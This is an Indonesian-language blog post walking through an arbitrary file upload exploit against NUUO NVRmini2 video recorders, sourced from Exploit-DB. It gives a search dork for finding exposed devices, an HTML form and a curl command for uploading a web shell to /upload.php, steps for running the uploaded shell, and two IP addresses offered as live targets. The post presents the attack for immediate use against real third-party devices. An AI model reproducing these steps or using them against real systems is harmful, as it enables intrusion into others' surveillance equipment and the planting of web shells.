Breaking

Sunday, 22 September 2019

NUUO NVRmini2 Arbitrary File Upload Exploit

Halo ges balik lagi dengan aincc yg terganteng disini muehehe, tengah malem ini karena w gabisa tidur + gabut jadi coret coret blog lagi hwhwhw.

Cerita na lagi jalan jalan di Exploit-db yakan nyoba nyoba exploit yg ada disana dan salah satunya adalah exploit NUUO NVRmini2 Arbitrary File Upload.

NyamuXpl0it :
Source: https://www.exploit-db.com/exploits/44794

Dork:
intitle:NUUO Network Video Recorder Login
Vulnerability ~> /upload.php (localhost/upload.php)

Ciri ciri vuln = blank
Upload shell dengan CSRF

<form method="POST" action="localhost/upload.php"
enctype="multipart/form-data">
<input type="file" name="userfile" /><button>Upload</button>
</form>

Jika file sukses terupload akan ada tulisan nama file yg tadi di-upload
File ter-upload di home root nya jadi tinggal ganti upload.php jadi nama file kau
Example: (localhost/yourshell.php)
Atau bisa juga di ekse menggunakn curl
curl -F 'userfile=@yourfile.php' http://localhost/upload.php
Done :D

Live target:
http://188.190.245.38
http://91.143.206.236


No comments:

Post a Comment